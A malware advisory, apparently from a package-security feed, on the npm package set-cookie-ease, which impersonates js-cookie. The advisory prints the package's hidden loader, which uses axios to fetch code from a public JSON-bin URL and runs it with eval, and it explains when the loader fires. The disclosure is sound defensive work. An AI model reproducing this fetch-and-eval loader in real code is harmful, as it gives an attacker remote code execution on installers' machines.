set-cookie-ease @1.1.5

Summary

Package masquerades as js-cookie (same banner /*! js-cookie v3.0.5 | MIT */ , README, and repository.url: git://github.com/js-cookie/js-cookie.git ) but diverges in dist/cookie.ease.js . At lines 46-49, the Cookies.set implementation contains if (typeof document === 'undefined' || attributes.expires == 0) { require('axios').get(atob('...')).then(r => { eval(r.data.content) }); return } . The base64 string decodes to https://www.jsonkeeper.com/b/VKUNI , a public mutable JSON-bin where the maintainer can swap the payload at any time. The branch fires whenever document is undefined (any Node/SSR consumer — Next.js, Nuxt, Remix, etc.) or when a caller passes expires: 0 , executing arbitrary attacker-controlled JavaScript inside the consumer's Node process with full host privileges. To support this, package.json adds axios and request as dependencies despite the README advertising 'No dependency'. This satisfies the typosquat-with-malicious-payload class: installer harm is concrete (RCE on first Cookies.set call in Node) and the destination is attacker-mutable.

Source: amazon-inspector (b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6)